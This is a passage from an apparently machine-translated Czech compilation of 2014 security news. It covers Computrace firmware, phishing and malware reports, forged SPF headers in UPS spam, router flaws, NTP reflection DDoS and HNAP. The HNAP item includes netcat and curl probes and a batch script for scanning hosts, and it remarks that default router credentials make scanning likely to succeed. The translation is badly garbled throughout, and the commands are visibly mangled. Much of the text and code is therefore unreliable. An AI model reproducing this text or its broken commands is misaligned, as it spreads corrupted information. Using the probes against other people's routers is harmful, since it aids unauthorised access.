pouze. Konkrétně, v rámci ProLiant jsme nejsou uvedení požadavků nárokových na MOP, I / O, nebo firmware řadiče,. jsme pouze opravňuje ProLiant systém ROM a komplexní programování logických zařízení (CPLD) firmware
Absolute Computrace software anti-krádež může být dálkově unesen
22.2.2014 Bezpečnost
Výzkum v oblasti bezpečnosti tým společnosti Kaspersky Lab vydala zprávu potvrzující, a které prokazují, že slabá implementace softwaru na ochranu proti krádeži trh Absolute Software může obrátit užitečnou obrannou nástroj do mocný nástroj pro cyberattackers. Ve stealth způsobem, že tato chudá implementace umožňuje útočníkům plný přístup ke miliony počítačů uživatelů. Zaměření výzkumu bylo Absolute Computrace Agent, který je umístěn ve firmware, nebo PC ROM BIOS, moderních notebooků a stolních počítačů. Hlavním důvodem tohoto výzkumného projektu byl objev Computrace Agent běží na několika soukromých počítačích výzkumných pracovníků společnosti Kaspersky Lab a firemní počítače bez předchozího povolení. Zatímco Computrace je legitimní produkt vyvinutý Absolute Software, někteří majitelé systémů prohlašoval, že oni nikdy nainstalován, aktivuje nebo kdy poznal o tomto software na svých počítačích. Většina tradičních pre-nainstalovány softwarové balíky mohou být trvale odstraněny nebo zakázány uživatelem, ale Computrace je navržen tak, aby přežil profesionální systém čištění a výměnu i pevného disku. uživatel může mylně rozpoznat Computrace jako škodlivý software, protože používá mnoho triků populární v moderní malware:. anti-ladění a anti-reverzní inženýrství techniky, injekce do paměti jiných procesů, vytváření tajných komunikací, záplatování systémové soubory na disku, udržet konfigurační soubory zašifrovány, a klesá spustitelný přímo z Windows BIOS / firmware Statistika:
Podle Security Network Kaspersky, tam je přibližně 150 tisíc uživatelů, kteří mají Computrace Agent běžící na svých strojích. Odhadovaný celkový počet uživatelů s aktivovaným Computrace Agent může být vyšší než 2 milióny. Je to jasné, kolik z těch uživatelů vědět o Computrace běží na svých systémů.
Většina z těchto počítačů se nachází ve Spojených státech se a Ruskem.
Síťový protokol používaný Computrace Agent Small poskytuje základní funkce pro vzdálené spuštění kódu. Protokol nevyžaduje použití jakéhokoliv šifrování nebo ověřování vzdáleného serveru, který vytváří mnoho příležitostí pro vzdálené útoky v nepřátelském prostředí sítě. útoku platformu Neexistuje žádný důkaz, že absolutní Computrace je používán jako platforma pro útoky. Nicméně, odborníci z několika společností, viz možnost útoků, některé alarmující a nevysvětlitelné skutečnosti nepovolených Computrace aktivací, aby to více a realističtější. Zpět v roce 2009, výzkumníci z Core Security Technologies představila svá zjištění na Absolute Computrace. Vědci varovali o nebezpečích této technologie a jak by útočník mohl upravit registr systému unést zpětná volání z Computrace. Agresivní chování Computrace Agent byl důvod, proč byl detekován jako malware v minulosti. Podle některých zpráv Computrace byla zjištěných společností Microsoft jako VirTool: Win32/BeeInject. Nicméně detekce byla později odstraněna společností Microsoft a některé anti-malware dodavatelů. Computrace spustitelné soubory jsou v současné době na bílé listině většina anti-malware společnosti.
Přenos a zálohování obsahu s duálním USB od společnosti SanDisk
22.2.2014 Bezpečnost
SanDisk oznámila SanDisk Ultra Dual USB disk, USB flash disk představovat jak mikro-USB a USB 2.0 konektor v elegantním a robustním provedení. Je určen pro Android uživatele, kteří potřebují přesunout obsah ze svých mobilních zařízení.
Zatímco jiné metody přenosu souborů z mobilního zařízení k počítači vyžaduje dráty, aplikace nebo bezdrátový set-up, SanDisk Ultra Dual USB disk prostě musí být připojen k mobilním zařízením s podporou funkce USB on-the-Go (OTG) pro přístup až 64 GB "plug and play" skladovací kapacitu. Navíc duální porty USB měniče mají zatahovací kryt, což znamená, žádné čepice ztratit, zatímco ještě drží konektory bezpečí. SanDisk dělá správu obsahu i jednodušší aplikace SanDisk Memory Zone . S tím, uživatelé jsou schopni lépe organizovat soubory uložené na interní a externí paměti telefonu pro správu, prohlížení, kopírování a zálohování - další zmírnění potíží uvolnění paměti na svém mobilním zařízení.
Vystavení ziskovost soukromých dat
22.2.2014 Kriminalita
Narušení bezpečnosti, počítačoví zločinci, a organizované útoky dělal to téměř nemožné, aby osobní a finanční údaje soukromé, podle Trend Micro.
Tato výroční zpráva poskytuje vhled do zranitelností dnešní technologií, které se rychle stávají vzájemně propojeny a "inteligentní". Bohužel, nová technologie zaváděná může poskytnout více příležitostí pro zločince, aby se daří, jak se vyvíjejí jejich kybernetických útoků a ohrožení podniku, včetně on-line bank a obchodů, zatímco se pohybuje blíže k domovům a jednotlivce prostřednictvím mobilní technologie. "Loni zahrnovalo velkou bezpečnost porušení, zvýšená malware a hrozby pro mobilní zařízení, které ovlivnily lidi ze všech oblastí života po celém světě, "řekl Raimund Genes, CTO společnosti Trend Micro. "Nyní více než kdy jindy, spotřebitelé a korporací musí být vytrvalí v pochopení jejich zranitelnosti, a to, co by mělo být provedeno z bezpečnostního hlediska lepší ochrany osobních údajů a ochranu proti oslabenou soukromí. Zatímco tato zpráva popíše hrozeb roku 2013, je ještě důležitější to vysvětluje, jak se tyto hrozby budou i nadále vyvíjet a co by mělo být provedeno s cílem snížit negativní dopad ". Zpráva zdůrazňuje, patří: Finanční hrozby: Jak on-line bankovní malware, který se přímo zaměřují finance obětí zesílil po celém světě v letošním roce, plodný ransomware zvýšil a se vyvinul do Cryptolocker v průběhu celého roku. Mobilní hrozby: Došlo značný nárůst jak objemu a propracovanosti mobilních hrozeb, jako hrozby na bázi PC převedeni na mobilní platformy. Do konce roku 2013, jsme viděli celkem 1,4 milionu škodlivých a rizikových Android aplikací jsou označeny. A uživatelé Apple nejsou imunní. 2013 došlo k nárůstu phishingových útoků konkrétně zaměřených na uživatele Apple jako zločinci rozpoznat potenciální výnos z této instalace základny. Osobní soukromí: Prostřednictvím sociálních sítí a "osobní cloud" účty, osobní soukromí se stal opakující se problém. Agresivní phishing útoky na koni na vydání populárních výrobků, jako jsou PS4 a Xbox One objevil ohrozit osobní informace. útoky na infrastrukturu: High-profil incidenty infrastruktury terčem kybernetických útoků se stal realitou v Jižní Koreji, ukazuje, jak důležité operace může být . dopad na širokém měřítku nepodporovaný software: 2013 viděl zvýšení povědomí o nepodporovaných verzí Java a Windows XP, který bude prezentovat rozšířené bezpečnostní problémy, jako záplaty a aktualizace skončí, když podpora pro systém Windows XP končí dubna 2014.
Rodiče se obávají, že jejich děti jsou vystaveny on-line hrozbami
22.2.2014 Bezpečnost
Více než čtvrtina (27 procent) rodičů věří, že jejich děti byly vystaveny nebezpečí na internetu, jako je například přístup k nevhodnému obsahu nebo kybernetické šikany v posledních 12 měsících, podle studie společnosti Kaspersky Lab. Přes toto, výzkum označit za bezpečnější internet Den koná dne 11. února bylo zjištěno, že jeden z pěti rodičů (22 procent) nepodnikne žádné kroky řídit on-line svých dětí aktivitu -. ať už na domácí počítač nebo mobilní zařízení "Bez ohledu na to, jak jejich děti přístup na internet, rodiče musí zůstat ostražití, dohlížet na jejich využívání internetu a zvážit rodičovské kontroly technologie. Nicméně, jako rodič sám, zjistil jsem tyto statistiky obzvláště znepokojující, když vezmete v úvahu rostoucí počet dětí pomocí připojených smartphony dnes. Koneckonců, když děti používají mobilní zařízení k přístupu webu, které používají stejnou internetu, se stejnými riziky - ale rodiče často nejsou tak vědomi nebezpečí, "říká David Emm, senior bezpečnostní výzkumník společnosti Kaspersky Lab. Studie také zjistila, že 18 procent rodičů ztratil peníze nebo data z jejich osobní zařízení v důsledku nekontrolovaného přístupu jejich dítěte. S smartphone apps často obviňováni v tisku pro děti nechtěně utrácet stovky liber, účinných kontrol a otevřené komunikační kanály kolem používání smartphone je nezbytně nutné. David Emm pokračuje: "Je mylná představa, že chytré telefony a tablety nepotřebují stejnou úroveň ochrany jako PC, ale s tak vysokým procentem rodičů, které nemají jasný pohled on-line jejich dětské aktivity, tento způsob myšlení se musí změnit. internetové připojení je neuvěřitelný zdroj, a to jak pro společenské využití a vzdělávací kapacity . ale stejným způsobem, jako bychom naučit své děti, aby přes silnici bezpečně, musíme se naučit je být si vědom, a vzhledem, nebezpečí na internetu. Jen proto, že hrozba je mimo dohled, neznamená to, . bychom neměli držet to přední mysli " David Emm nabízí následující tipy, aby zůstali v bezpečí on-line: 1. Oba Android smartphony a iPhone jsou vybaveny vestavěným rodičovské kontroly - při nákupu smartphone, požádat asistenty prodeje k prokázání těchto funkcí. Mají politiky v místě a odpovědnost, aby se rodiče vědomi z nich. Vytvořením poptávku, to je více pravděpodobné, že bude, aby ostatní rodiče vědí. 2. Použít nastavení, které brání in-app nákupech ušetřit pádný účty by měly děti narazí na hru s drahými doplňky. 3. Nainstalujte bezpečnostní software - tito poskytovatelé budou nabízet aplikace odfiltrovat nevhodný obsah, například, pro dospělé obrazy a odesílatelů obtěžující SMS zpráv. 4. Povzbuďte děti, mluvit o jejich online zkušenosti a zejména, cokoli, co z nich dělá nepříjemné nebo ohrožen. Otevřete komunikační kanál tak mají pocit, že mohou diskutovat ve všech oblastech svého života, on-line bez strachu z rozsudku nebo pokárání. 5. Ochrana dětí před kybernetickými tyrany je obzvláště náročné s chytrými telefony, protože mohou být zaměřena v mnoha ohledech, a to zejména z pohledu jejich rodičů. Zabývat se kybernetické šikany, jako byste v reálném životě podporou děti být otevřený a mluvit důvěryhodného dospělého, pokud se u nich objeví nějaké výhružné nebo nevhodné zprávy. Čísla a kontakty na aplikace mohou oba být blokovány, pokud se dělají děti nepříjemné.
Jak crimeware vyvíjí, zvýšit phishingové útoky
22.2.2014 Phishing
Počet phishingových kampaně vzrostl o více než 20 procent ve třetím čtvrtletí roku 2013, s crimewaru útoky vyvíjí a množí, podle APWG.
Celkový počet unikátních phishingových internetových stránek pozorovaných zvýšil na 143.353 ve 3. čtvrtletí, a to až od Q2 je 119101. Tento nárůst je obecně přičíst rostoucí počet útoků proti legalizaci-přenos a maloobchodní / e-commerce webové stránky. Ve stejném období, tam byl 8 procent pokles počtu značek, na něž phisherů, jako počet značek cílené spadl z all-time high 441 v dubnu 2013 - 379 v září 2013. útoku pokračoval se vyvinout, umístěním sociální média v čele crimewaru v čele v prvním čtvrtletí. "Ve 3. čtvrtletí roku 2013, jsme také viděli změnu phishing témat používané malware autoři. Důraz na sociální média-themed témat, jako je například "Výzva pro připojení na LinkedIn", byl používán k nalákání uživatelů, kteří budou zvyklí na taková témata, "řekl APWG přispěvatelem Carl Leonard z Websense Security Labs. APWG člen PandaLabs katalogizovány téměř 10 milionu nových crimewaru vzorky od července do září, a PandaLabs poznamenal, že počet nových vzorků malwaru v oběhu v prvních devíti měsících roku 2013 byl vyšší než v úhrnu za celý rok 2012. Více než 59 procent počítačů v Číně se zdá být napaden s malware nebo spyware, rekordní pro každou zemi. Úplná zpráva je k dispozici zde .
Aktualizace Apple iOS a Apple TV
22.2.2014 Zranitelnosti
Apple rozeslal 3 bulletiny a aktualizace OS dnes (iOS 6.1.3, iOS 7.0.6, a Apple TV 6.0.2), všechny, kterým se stanoví chybu, která by mohla povolit SSL / TLS spojení být citlivé na nezjištěný man-in-the- střední útoky. Všechny tři aktualizace sdílejí stejné číslo CVE CVE-2014-1266. Aktualizace stránky Apple Bezpečnost dosud Zdá se, že aktualizace uvedené tam, ale měly by tam být krátce (může tam být v době, kdy budete číst tento). Pokud máte zařízení Apple se systémem iOS 6 nebo 7, nebo Apple TV, asi byste měli používat tyto aktualizace ASAP.
Ref: Aktualizace zabezpečení Apple strana - http://support.apple.com/kb/HT1222
UPS Malware Spam Použití Fake SPF záhlaví
22.2.2014 Viry
"Sender Policy Framework" je jednoduchý systém pro identifikaci, které poštovní servery mohou posílat e-maily jménem vaší domény. Mluvili jsme o tom (a jiné normy, jako je DMARC, DKIM) před.
Tyto systémy jsou obvykle realizovány na svých e-mailových bran. Odchozí brána podepíše e-mail pomocí domény klíč (pro DKIM). Přijímací mailová brána zkontroluje, zda jsou přítomny a správné záhlaví. Mail Gateway se pak přidá speciální hlavičku s výsledkem kontroly, a to speciální hlavička se pak použije spam filtry se rozhodnout, zda zachovat e-mail (nebo ne).
Zdá se, že spammeři se učí a našel způsob, jak oklamat některé špatně nakonfigurované poštovní brány a spam filtry. Spammer přidá hlavičku o tom, že e-mail prošel ověření SPF. William nám poslal vzorek UPS tématickém e-mailu, který obsahoval škodlivý přílohu. To zahrnovalo následující záhlaví:
Předmět: UPS Delivery Notification sledovací číslo: <random řetězec>
Datum: Po. 17.únor 2014 11:56:04 -0300
Od: UPS Quantum View <auto-notify@ups.com>
X-Priority: 3
X-Mailer: PHPMailer 5.1 (phpmailer.sourceforge.net)
Message-ID: <3b8bfaf8-830d-4804-94fa-96cf3eb3c052@ups.com> Received-SPF: průchod (google.com: doména no-replay@ups.com se jmenuje 192,123. 32.83 jako povolené odesílatele) klient-ip = 192.123.32.83, Received: od 192.123.32.83 (EHLO mailer.ups.com) (192.123.32.83) Received: by mailer.ups.com (Postfix, z userid 1000) id A838D7824B; X-Mailer: MIME-tools 5.41 (Entity 5,404) X-Message-Status: s1: 0 X-SID-PRA: UPS Quantum View <auto@ups.com> X-SID-Výsledek: TempError konverze-S-Loss: ano
Červená čára ukazuje, že e-mail prošel ověření SPF. Nicméně, pokud jste kontrolu záznam UPS.com SPF:
$ Dig + krátký TXT ups.com
"V = spf1 IP4: 153.2.232.0/22 IP4: 192.55.236.50/31 IP4: 113.106.161.16 IP4: 113.106.161.18 IP4: 12.104.201.4/31 patří: custhelp.com patří: commerceplus.com.au-all"
Není tam žádná zmínka o 192.123.32.83. Záhlaví přidala odesílatele, ne přijímací mailové brány.
(Budete muset zkontrolovat domén "patří" stejně. Odjíždím jako cvičení pro čtenáře).
Pokud se rozhodnete SPF kontrolu na příjem e-mailu brány, budete muset ujistěte se, že nejprve zbavit všech stávajících SPF záhlaví označující SPF zpracování. V opačném případě odesílatel mohl přidat falešné hlavičky, jako je výše.
K soukromým datům má kvůli chybě routeru přístup kdokoli
19.2.2014 Incident
Žádné hluboké znalosti síťových protokolů a prolamování promyšlených hesel. K cizím datům se může dostat prakticky kdokoliv kvůli bezpečnostní chybě v některých routerech od Asusu. Právě kvůli této trhlině získá nezvaný návštěvník přístup k připojeným síťovým diskům. Upozornil na to ve středu server Cnet.
Tato zranitelnost je o to vážnější, že přístup k datům na cizích flashkách nebo externích discích připojených k routerům od Asusu může získat každý, kdo zadá do internetového prohlížeče nebo FTP klienta IP adresu zařízení (unikátní adresa pro každý přístroj v prostředí internetu).
Poté se mu hned zobrazí všechna uložená data, není potřeba obcházet žádné sofistikované zabezpečení. Tento postup vyzkoušely Novinky v praxi a skutečně funguje.
Dostat se k cizím datům je otázka pár vteřin. Stačí znát IP adresu postiženého zařízení.
Trhlina přitom není podle bezpečnostních expertů nijak nová. Jak připomněl server Ars Technica, hlášena společnosti Asus byla již v loňském roce. Přestože je záplata již k dispozici, v ohrožení je stále několik tisícovek uživatelů. Opravu je totiž nutné nainstalovat manuálně, což řada lidí ani neví.
Internetem začal totiž kolovat seznam více než 13 000 IP adres postižených routerů.
Velmi závažný začal být problém před dvěma týdny. Internetem začal totiž kolovat seznam více než 13 000 IP adres postižených routerů. Drtivá většina z nich je navíc skutečně pravá.
Hacker pomáhá chránit data
Vyřešit problém a zachránit lidem data se pokusil v minulých dnech hacker vystupující pod přezdívkou /g/. Začal se lidem „nabourávat“ na disky připojené k bezdrátovému směrovači, kam jim nahrává textový soubor s informacemi o trhlině a o tom, jak ji zazáplatovat.
V podstatě stačí na webu Asusu najít stránku svého routeru, kde jsou v záložce podpora ke stažení všechny dostupné aktualizace. Řešením je samozřejmě i odpojení externích disků a flashek.
Zabezpečení je podceňováno
Bezpečnostní problémy spojené se síťovými prvky, prostřednictvím kterých přistupují lidé k internetu, nejsou nijak výjimečné. Naopak, setkávat se s nimi budeme stále častěji, což dokládá i aktuální hrozba týkající se routerů značky Linksys.
„Výzkumníci institutu SANS objevili nového samoreplikujícího se červa, který napadá různé domácí a routery značky Linksys. Analytici zatím nezjistili, zda je v červu zabudován nějaký nebezpečný kód či zda se červ připojuje na nějaký server,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Lidé by proto měli důsledně instalovat všechny aktualizace, které jsou pro jejich síťové prvky dostupné. V současné době totiž není výjimkou, že se v domácnostech objevují i několik let staré přístroje, na které nebyla nikdy nainstalována žádná oprava.
Dost mobilní benevolence aneb McAfee se vrací
19.2.2014 Mobil
John McAfee, nepřehlédnutelná postava bezpečnostní scény, která se po mnoha letech znovu zviditelnila na mnoha excesech, plánuje nový produkt – aplikaci Cognizant pro Android.
John McAfee za poslední rok uveřejnil několik videí a blogů, ve kterých si vyřizoval účty se státy, kritiky, neváhal ani kritizoval kvalitu stávajících produktů své bývalé firmy, která kdysi definovala standardy antivirových produktů. Nakonec ale překvapil tím, že se rozhodl vrátit k aktivnímu vývoji bezpečnostních řešení.
První z jeho nových produktů by se měl objevit na scéně 1. března, kdy bude uveden Cognizant, bezplatná aplikace pro mobilní zařízení platformy Android. Své uživatele by měla chránit především před naprosto nekontrolovatelným přiřazováním práv, které podstupují s každou nově nainstalovanou aplikací. Je pravda, že operační systém Android vypíše práva, kterých se aplikace dožaduje, bohužel uživatel může pouze souhlasit, nebo povolení k instalaci zrušit.
Opecné oprávnění aplikací
Právě tento přístup ke správě práv je velmi nešťastný. Uživatel nemá právo detailněji pracovat s politikami, pokud bude například aplikaci typu Zápisník používat pouze pro své „lokální“ poznámky bez potřeby něco synchronizovat přes internet, je pro něj zbytečné bezpečnostním rizikem, aby taková aplikace měla práva iniciovat internetové spojení nebo ještě absurdnější práva, jako je formátovat lokální úložiště, zjistit polohu zařízení nebo kopírovat kontakt ze seznamu.
Cognizant si klade za cíl vrátit možnost věci alespoň trochu ovlivňovat do uživatelových rukou. Aplikace funguje na stejném jádru, které by mělo být základem budoucího produktu D-Central. Překvapivě rychlé uvedení aplikace může souviset s nedávno uniklou informací o tom, jak NSA těží citlivá data z řady mobilních aplikací, včetně populárních Angry Birds. Nikdo ale nepochybuje, že v menším měřítku (především díky menším rozpočtům, nikoli kvůli větším zábranám) se podobně snaží i jiné vlády a velké i malé zločinecké organizace.
Nové bezpečnostní řešení
John McAfee je stále nepřehlédnutelná postava světa ICT, ikona bezpečnosti a nepochybně velmi schopný člověk. Již jednou se mu podařilo vystavět bezpečnostní firmu v době, kdy většina nebezpečí internetu byla podceňována nebo prostě neznáma, firmu, která byla nakonec zhodnocena a prodána za 7,6 miliardy dolarů. Je evidentní, že dnešní John McAfee si velmi osvojil techniky technologických startupů – vývoj řídí z Montrealu prostřednictvím videokonferencí a virtuálních schůzek a je velmi pravděpodobné, že se můžeme těšit na působivý a po několika rychlých iteracích velmi užitečný produkt.
Podvodníci napálili stovky tisíc lidí, pomalu jim vysávají peníze přes telefon
18.2.2014 Mobil
Rozmachu chytrých telefonů jsou si vědomi i počítačoví piráti. Internetem tak koluje celá řada škodlivých mobilních aplikací, které jim pomáhají odsávat peníze z účtů jiných lidí. Podle analýzy bezpečnostní společnosti Pandalabs se kyberzločincům podobným způsobem podařilo nakazit více než 300 000 zařízení s operačním systémem Android.
Podvodníci se snaží důvěřivce většinou nalákat na nejrůznější hry, výjimkou nejsou ale ani aplikace pro organizaci času nebo asistenti pomáhající s hubnutím. Podobné aplikace mají vždy společný základ – jejich instalací uživatel dovoluje odesílat prémiové SMS zprávy.
Právě kolonkám, které informují o různých oprávněních aplikace, nevěnuje většina lidí při instalaci žádnou pozornost. Že se nechali počítačovým pirátem napálit, tak zpravidla poznají až z tučného výpisu telefonního účtu.
Podvodnými aplikacemi si kyberzločinci přišli na více než 120 miliónů korun.
„Již bylo infikováno nejméně 300 000 uživatelů OS Android. Čtyři nalezené aplikace, které jsou sice zdarma, ale mají potají přidanou funkci premium SMS, se jmenují ‚Easy Hairdos‘, ‚Abs Diets‘, ‚Workout Routines‘ a ‚Cupcake Recipes‘,“ varoval analytik Pavel Bašta z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.
Výzkumníci ze společnosti Pandalabs odhadují, že těmito podvodnými aplikacemi si kyberzločinci přišli minimálně na šest miliónů dolarů, tedy na více než 120 miliónů korun. Toto číslo však nemusí být ani zdaleka konečné, protože internetem koluje daleko více podvodných programů.
Podvodná kopie populární hry
Například minulý týden se ukázalo, že počítačoví piráti zneužívají i populární hru Flappy Bird. Podvodné verze tohoto titulu vypadají do posledního puntíku stejně jako originál. Dokonce mají na ploše i stejnou ikonu. Poznat je navíc není vůbec jednoduché, protože internetem kolují i neinfikované kopie Flappy Birdu. [celá zpráva]
Flappy Bird
„Falešné aplikace na rozdíl od těch legitimních zneužívají zpravidla mobilní přístroje k platbám za prémiové služby. Odesílání SMS zpráv na placená čísla lidé odhalí zpravidla pozdě, až po příchodu velmi vysoké faktury,“ varovali bezpečnostní experti z laboratoří TrendLabs.
Podvodné aplikace zatím bezpečnostní experti zachytili na přístrojích s operačním systémem Android. Podle nich se však kopie Flappy Birdu objevují především na různých diskuzních fórech a alternativních internetových tržištích, nikoli v oficiálním obchodu pro Android.
Lidé podceňují zabezpečení
Důvod, proč se počítačoví piráti stále častěji zaměřují na chytré telefony a počítačové tablety, je prostý. Zatímco na zabezpečení klasických počítačů si lidé již zvykli, ochrana mobilních přístrojů je většinou nijak netrápí. A právě to je kámen úrazu.
Na tabletu i smartphonu byl měl být samozřejmostí antivirový software. Vhodné je také stahovat aplikace pouze z legitimních zdrojů a v každém případě kontrolovat oprávnění, co který program může skutečně vykonávat bez autentizace majitele.
NTP reflexe útoky
18.2.2014 Počítačový útok
Jak jsme zde diskutovali v lednu, došlo k výraznému nárůstu velkých Network Time Protocol (NTP) reflexe DDoS útoky. V takovém útoku, útočník odešle vytvořený paket, který vyžaduje velké množství dat, které je nakonec odeslána na falešnou hostitele.
V našem předchozím příspěvku [1], jsme diskutovali v detailu příkazu "monlist", ale není to jen "monlist", které mohou být zneužity, ale mnoho level-6 a level-7 příkazy jako "showpeer", "sysstats", "vrstevníky "," listpeers ".
Chcete-li uzamknout serveru NTP, prosím, sledujte náš předchozí příspěvek a upgrade verzi NTP, jak je uvedeno US-Cert zde [2].
Navíc, jak FYI, nedávný americký Cert upozornění [3] identifikovat další možné zdroje zesílení útoků UDP a je doporučeno zkontrolovat.
Pro ty, kteří si, dobře, že se to nestane, aby mě nebo "Koho to zajímá, DDoS útoky byly děje od roku 1999" v letošním roce již prokázala nadměrný počet veřejných útoků pomocí NTP, vytváří zničující záplavu provozu komukoliv bez vrcholu zmírnění zářez * opatření postavili. A my jsme až v únoru.
Web Brian Krebsova je, reportér, že psát o kybernetické bezpečnosti příběhy, byl zasažen 200Gbps NTP provozu v průběhu minulého týdne [4]. Brian zprávy, jak a kým zahájila útok na detail příběhu, který je dobře stojí za to číst. Není to jen malé cíle, od začátku roku 2014, jak je zde uvedena, mnoho on-line webové stránky herních byly zaměřeny pomocí těchto reflexe typu útoků se útočníci přičemž na Twitter oznamuje blížící se záchvat a později slunit na slávě. Nejnovější Arbor zpráva [5] hovoří o tom v dalším podrobněji zmiňuje útoky až 309Gbps a jména příslušné Twitter ID tweeting o DDOS. Cloudflare uvedla, že útok viděli na začátku tohoto týdne bylo 400Gbps. Samotná velikost těchto útoků znamenat, že prostě nemají rozbít cíl, ale významné oblasti Internetu, tj. velké vedlejší škody.
Pokud vidíte NTP reflexe útoky jsou zaměřeny směrem k vám, standardní nejlepší praxe vyplývá -
• Naneste ACL do obvodové síti a pokud možno proti proudu
• Práce s vaším ISP (y), aby učinili totéž [6]
• Uzamkněte své vlastní NTP servery a další UDP-naslouchání servery
• Pokud zjistíte otevřené NTP servery, hlásit je do projektu Otevřená NTP [7]
Pro ty, kteří hledají šikovné DDoS stručná referenční příručka vysvětluje různé DDoS útok http://www.us-cert.gov/sites/default/files/publications/DDoS% 20Quick% 20Guide.pdf
* Pro většinu podniků DDoS zmírnění má finanční náklady spojené s tím, že zvyšuje směrem nahoru pro zvýšení ochrany
[1] https://isc.sans.edu/diary/NTP+reflection+attack/17300
[2] https://www.us-cert.gov/ncas/alerts/TA14-013A
[3] https://www.us-cert.gov/ncas/alerts/TA14-017A
[4] http://krebsonsecurity.com/2014/02/the-new-normal-200-400-gbps-ddos-attacks/
[5] http://www.arbornetworks.com/asert/2014/02/ntp-attacks-welcome-to-the-hockey-stick-era/
[6] http://www.ietf.org/rfc/rfc3704.txt
[7] http://openntpproject.org/
Skenování na aplikaci Symantec Endpoint Protection Manager
18.2.2014 Bezpečnost
Minulý týden jsme se zmínili o novou chybu zabezpečení v aplikaci Symantec Endpoint Protection řízení [1]. Podle poradenské společnosti Symantec, tento produkt naslouchá na portu 9090 a 8443/TCP. Oba porty jsou pravidelně testovány na různé zranitelnosti, zejména 8443, je, že to je tím, webových serverů často používají jako alternativa k 443.. Nicméně, 7. února, jsme zjistili značný nárůst vyšetření pro oba porty.
Zajímavé je, že to vypadá, že dvě různé IP adresy způsobilo tento nárůst, skenování pouze za každý jeden port.
217.174.250.228 je "silák" na portu 8443, a 125.217.252.183 pro portu 9090. Neexistuje žádná organizační propojení mezi dvěma IP na základě Whois.
125.217.252.183 je přiřazen k univerzitě v Číně (whois záznam obsahuje trochu divně vypadající "popis": ~ {; * DO @ M9 $ 4SQ '~}). 217.174.250.228 je přiřazen k britské hostingové společnosti.
Můj předpoklad je, že oba hostitelé byly ohroženy v té době.
V současné době jsme také svědky velký nárůst skenování na portu 9090 , ukazuje na někoho, kdo staví cílovou seznam ohrožených systémů. Docela hodně jediným zdrojem skenování dnes je 113.010.155.079 . Tato adresa je zajímavý v tom, že není přiřazen podle APNIC (RIV na starosti tuto adresu), ale to reagovat na ping. To provozuje webové stránky phpMyAdmin jako výchozí hostitel, který do značné míry zaručuje, že je oslabený systém (může ve skutečnosti být také honeypot).
[1] http://www.symantec.com/docs/TECH214866
HNAP - Co je to, jak ji používat, jak najít to
18.2.2014 Bezpečnost
Měli jsme spoustu diskusí o nejnovější sady domácí router zranitelnosti na základě protokolu HNAP (viz čtvrteční příběh napsal Johannes: https://isc.sans.edu/diary/Linksys+Worm+% 22TheMoon% 22 + Celkem% 3A + Co + + my víme + tak + far/17633 ). Ale co je HNAP protokol, a proč je tak trvale zapnutý?
HNAP (Home Network Administration Protocol) je protokol pro správu zařízení sítě, vhodné pro každého, ale myslím, že primárně určeny pro ISP pro správu flotily zařízení rozmístěných v rámci předplatného k internetu. To se vztahuje v patentu US 20070130286 ( http://www.google.com/patents/US20070130286 ), a je dobře popsána v dokumentu Cisco zde nalezeno http://www.cisco.com/web/partners/downloads/guest/ hnap_protocol_whitepaper.pdf
protokol byl patentován původně čistě sítě, ale protokol je nyní ve vlastnictví a implementace byla převedena společností Cisco. Takže pro zařízení, která by mohla potenciálně být nasazeny a řízených ISP, nebo dokonce korporace na dálkové stránek, chcete protokol řízení, který je ve výchozím nastavení zapnuta a je obtížné pro vzdálený uživatel vypnout. Nebo z některých zpráv, na některých zařízeních tento protokol zůstane zapnutý i po vašem vypněte jej (pardon, trochu tam přetrvávají). A ano, ironie někoho "v biz" rozhodujícím v roce 2007, že ještě potřebujeme další clear- protokol pro správu sítě textu se mi utéct. Vzhledem k tomu, HNAP používá SOAP, můžete použít HTTPS jako dopravní, ale zranitelnosti k dnešnímu dni byly většinou jasné textu a základní info přístroj dotaz je ve formátu prostého textu.
Jak Johannes popsáno včera, snadno Linux / OS X způsob, jak testovat HNAP je:
echo "GET / HNAP1 / HTTP/1.1 \ r \ nHost: test \ r \ n \ r \ n" | nc routerip 8080
Co ještě můžete dělat s HNAP? Můžete také jen vytáhnout na stránku základní "Get Info" zařízení pomocí prohlížeče klienta, wget nebo curl (můžete dostat jak z těchto nástrojů pro Windows)
wget http://routerip/HNAP1/
nebo stočit http://routerip/HNAP1
nebo nasměrujte prohlížeč na http://routerip/HNAP1
Dávám přednost použití zvlnění na to. Snadné skriptu, a od té doby HNAP je založen SOAP, můžete tak učinit požadavků SOAP (pomocí POST namísto GET) pomocí curl (-X POST-H "bez ohledu na vaše mýdlo je řetězec")
Jaký výkon se dostanete z tohoto jednoduchého příkazu dotazu? Získáte základní informace o zařízení, jakož i seznam jiných platných SOAP příkazy můžete poslat na vaše konkrétní zařízení:
C: \> curl http://192.168.1.1/HNAP1 <xml version = "1.0" encoding = "utf-8">? <soap: Envelope xmlns: xsi = "http://www.w3.org/ 2001/XMLSchema-instance "xmlns: xsd =" http://www.w3.org/2001/XMLSchema "xmlns: mýdla =" http://schemas.xmlsoap.org/soap/en velope / "> <soap: body> <GetDeviceSettingsResponse E4200 </ ModelDescription> <ModelName> E4200 </ ModelName> <FirmwareVersion> 1.0.04 build Bezdrátový
Většina z těchto dalších příkazů HNAP vyžadují ověřování a v mnoha případech HTTPS šifrování (v závislosti na provedení přístroje), ale výchozí pověření pro domácí routery jsou dobře známy a vaše šance na úspěch jsou dobré, pokud skenujete pomocí nich - ve většině případů vlastní -podepsané certs jsou ve hře, i když jste "muž uprostřed" čichání důvěryhodně provozu s nástrojem, jako je Ettercap, je pravděpodobné, že bude úspěšný. A samozřejmě HNAP využije neobtěžujte s hloupými věcmi, jako pověření vůbec.
Využije proti HNAP nejsou ničím novým - se vrátit k papíru 2010 www.sourcesec.com / Lab / dlink_hnap_captcha.pdf , který popisuje hacking DLink směrovače.
Takže, co je to nejjednodušší způsob, jak vytvořit výčet síť pro HNAP zařízení? Například, pokud chcete skenovat váš domov nebo pracovní sítě z neznámých / neoprávněným HNAP služby? HNAP1 dotaz samozřejmě se dostanete to, co chcete, můžeme použít to, co jsme se naučili tak daleko, aby rychle napsat "chkhost.cmd" dávkový skript pro Windows:
@ Echo off
REM syntaxi: chkhost.cmd host.ip.add.ress
ping-n 2% 1 | findstr "time ="> nul
, pokud errorlevel == 1 goto endend
REM Host je nahoru, nyní zkontrolovat HNAP
curl-s http :/ /% 1/HNAP1 | findstr "HNAP"> nul
